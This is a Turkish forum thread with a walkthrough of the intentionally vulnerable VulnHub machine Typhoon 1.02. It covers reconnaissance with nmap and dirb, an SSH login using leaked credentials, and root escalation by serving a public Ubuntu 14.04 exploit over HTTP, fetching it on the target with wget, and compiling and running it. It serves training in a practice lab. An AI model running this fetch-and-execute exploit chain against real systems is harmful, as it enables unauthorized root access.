İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Typhoon: 1.02 Zafiyetli Makine Çözümü

07-12-2018 14:26
#1
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Siber Güvenlik Ekibi
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.505
Teşekkür (Etti):
77
Teşekkür (Aldı):
462
Konular:
52
Typhoon: 1.02 Zafiyetli Makine Çözümü

Typhoon: 1.02 indirme linki;

Kod:
https://www.vulnhub.com/entry/typhoon-102,267/
Makinemizin ilk açılış görüntüsü.





İlk olarak makinemizin IP adresini öğreniyoruz.

Kod:
netdiscover




Ardından nmap taraması ile açık portlara bakıyoruz.

Kod:
nmap -sS -sV <adress>




Sitemize bir bakıyoruz.Bizi bu şekilde bir site karşılıyor.



Ardından dirb taraması yapıp site içerisindeki dosyalara bakıyoruz.

Kod:
dirb http://<adress>




Sitemizde robots.txt adlı bir uzantı var çoğunlukla burada çözümde ilerlemeye dayalı bilgiler barındırılıyor hemen robots.txt'yi açıyoruz.



robots.txt'yi açtığımızda bize başka bir uzantıya gitmemiz gerektiğini söylüyor.



[stats] a bastığımız zaman aşağıya bir takım giriş bilgilerinin geldiğini görmekteyiz.



Bu giriş bilgileri doğrultusunda giriş yapmayı deniyoruz.

Kod:
ssh typhoon@<adress>
Kod:
789456123


Şimdi kendimizi root'a yükseltmemiz gerekiyor.Bunun için ilk olarak ubuntunun exploitlerine bakıyoruz.Ardından 7575 portu üzerinden python kodu ile giriş sağlayacağız.7575 portumuzu dinlemeye alıyoruz.


Kod:
searchsploit ubuntu 14.04
Kod:
searchsploit -m 37292
python -m SimpleHTTPServer 7575


Şimdi dinlemeye aldığımız 7575 portumuza makinemizden 37292.c dosyasını indirmesini sağlıyoruz.Ardından 37292.c dosyasını derlemesini sağlıyoruz.Derledikten sonra da dosyamızı açıyoruz.


Kod:
cd /tmp
Kod:
wget http://<uradress>:7575/37292.c
gcc 37292.c -o exploit
./exploit


Açıktan yararlanarak sistemde root kullanıcısı olduk şimdi tek yapmamız gereken flag.txt'yi aramak olacak.

Kod:
cd /root
Kod:
cat root-flag








Kullanıcı İmzası
A hacker does for love what others would not do for money.
Konu Qwx tarafından (07-12-2018 14:27 Saat 14:27 ) değiştirilmiştir. Sebep: flag.jpg'yi ortaladım.
oxcakmak Teşekkür etti.

07-12-2018 14:28
#2
oxcakmak - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
Kocaeli
Yaş:
20
Mesajlar:
1.234
Teşekkür (Etti):
456
Teşekkür (Aldı):
125
Konular:
71
Ellerine sağlık bu local hack için mi?
Kullanıcı İmzası
Back-End Developer
07-12-2018 14:36
#3
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Siber Güvenlik Ekibi
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.505
Teşekkür (Etti):
77
Teşekkür (Aldı):
462
Konular:
52
Alıntı:
oxcakmak´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık bu local hack için mi?

Teşekkür ederim.Evet local hack için.
Kullanıcı İmzası
A hacker does for love what others would not do for money.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı